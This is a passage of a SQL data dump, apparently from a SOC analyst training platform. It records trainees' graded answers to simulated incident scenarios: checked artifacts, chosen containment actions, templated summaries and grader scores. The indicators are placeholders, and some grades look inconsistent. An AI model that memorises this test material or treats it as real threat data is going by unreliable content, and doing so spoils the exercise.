concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-27T02:46:10.646Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:37:57', '2026-02-28 21:00:00', 0, NULL),
(350, 189, 294, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:49:36 AM\\nALERT: Initial Access via Spear Phishing Campaign [OP: Operation Golden Ticket]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.45\\n- [EMAIL] it-security@bank.com\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED:Amadou MANE\",\"submitted_at\":\"2026-02-27T02:49:49.789Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:46:32', '2026-02-28 21:00:00', 0, NULL),
(351, 189, 295, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.10.45\",\"ip-203.0.113.15\",\"cmd-1\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:51:13 AM\\nALERT: Malware Execution and Credential Harvesting [OP: Operation Golden Ticket]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.10.45\\n- [IP] 203.0.113.15\\n- [COMMAND] C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\credential_harvester.exe\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [FILENAME] credential_harvester.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-27T02:51:25.909Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:49:49', '2026-02-28 21:00:00', 0, NULL),
(352, 189, 296, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.2.15\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:54:36 AM\\nALERT: Lateral Movement through Network Exploitation [OP: Operation Golden Ticket]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.2.15\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] jdoe_admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-27T02:54:51.331Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:51:25', '2026-02-28 21:00:00', 0, NULL),
(353, 189, 297, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.25\",\"hash-4e5b6c7d\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:57:27 AM\\nALERT: Manipulation of ATM Withdrawal Limits and SWIFT Gateway [OP: Operation Golden Ticket]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.25\\n- [HASH] 4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\n- [USERNAME] jdoe_admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-27T02:57:42.725Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:54:51', '2026-02-28 21:00:00', 0, NULL),
(354, 189, 304, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.25\",\"domain-http://malic\",\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/4/2026, 2:45:49 AM\\nALERT: Spear Phishing Email Detected [OP: Operation Desert Mirage]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.25\\n- [DOMAIN] http://maliciousdomain.com/securelogin\\n- [EMAIL] finance.partner@maliciousdomain.com\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (0)\\n------------------------------\\n(No active containment measures)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-03-04T01:46:47.206Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:57:56', '2026-03-04 01:46:47', 0, NULL),
(355, 209, 1285, 'investigating', NULL, NULL, NULL, NULL, '2026-02-27 07:14:49', '2026-02-27 04:05:49', '2026-02-27 04:05:49', 0, NULL),
(356, 214, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-27 06:14:06', '2026-02-27 06:14:06', 0, NULL),
(357, 196, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 2:57:07 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-27T06:57:22.400Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 06:52:53', '2026-02-28 21:00:00', 0, NULL),
(358, 196, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 2:59:20 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-27T06:59:24.541Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 06:57:22', '2026-02-28 21:00:00', 0, NULL),
(359, 196, 270, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:01:57 PM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block File Hash\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-27T07:01:59.915Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/6)\",\"missed_items\":[\"block_ip\",\"reset_credentials\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 06:59:24', '2026-02-28 21:00:00', 0, NULL),
(360, 196, 271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:04:49 PM\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-27T07:04:52.460Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 07:01:59', '2026-02-28 21:00:00', 0, NULL),
(361, 196, 272, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:06:35 PM\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-27T07:06:44.821Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 07:04:52', '2026-02-28 21:00:00', 0, NULL),
(362, 196, 274, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-27 07:06:58', '2026-02-27 07:06:58', 0, NULL),
(363, 217, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-01 03:17:30', '2026-03-01 03:17:30', 0, NULL),
(364, 223, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-01 15:51:16', '2026-03-01 15:51:16', 0, NULL),
(365, 224, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-01 15:54:55', '2026-03-01 15:54:55', 0, NULL),
(366, 225, 268, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 02/03/2026, 4:24:24 pm\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-02T05:24:48.736Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-02 01:00:00', '2026-03-02 05:24:48', 0, NULL),
(367, 225, 269, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"reset_credentials\",\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 02/03/2026, 4:27:24 pm\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-02T05:27:39.111Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-02 05:24:48', '2026-03-02 05:27:39', 0, NULL),
(368, 226, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-02 05:27:10', '2026-03-02 05:27:10', 0, NULL),
(369, 225, 270, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 02/03/2026, 4:28:57 pm\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-02T05:29:01.620Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-02 05:27:39', '2026-03-02 05:29:01', 0, NULL),
(370, 229, 268, 'graded', 70, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 6:20:15 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T01:20:21.813Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/4)\",\"missed_items\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-03-02 15:05:11', '2026-03-11 01:20:21', 0, NULL),
(371, 232, 268, 'graded', 78, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 1:50:26 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T08:20:36.127Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/4)\",\"missed_items\":[\"block_ip\",\"block_hash\",\"collect_forensics\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-03-03 03:14:28', '2026-03-07 08:20:36', 0, NULL),
(372, 178, 1361, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/3/2026, 3:42:42 PM\\nALERT: Initial Access via Trojanized Trading App [OP: Operation TraderTraitor]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [FILENAME] TradePlusPro_Setup.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (7)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-03T08:42:53.354Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-03 11:47:33', '2026-03-03 08:41:33', '2026-03-03 08:42:53', 0, NULL),
(373, 178, 1362, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-185.100.87.202\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/3/2026, 3:44:49 PM\\nALERT: Execution of Remote Access Trojan (RAT) [OP: Operation TraderTraitor]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 185.100.87.202\\n- [HASH] b9f7b3e3f5ab4a3a8f1a2f4e2a7b9d8c\\n- [USERNAME] jdoe\\n- [FILENAME] rat_executable.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (7)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-03T08:44:54.733Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-03 08:42:53', '2026-03-03 08:44:54', 0, NULL),
(374, 178, 1363, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.105\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/3/2026, 3:46:36 PM\\nALERT: Persistence through Credential Theft [OP: Operation TraderTraitor]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.105\\n- [USERNAME] jdoe\\n- [HASH] f7a2edb1b4567e2d5f8e8497c9a3f378\\n- [FILENAME] wannacry.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (7)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-03T08:46:47.762Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct 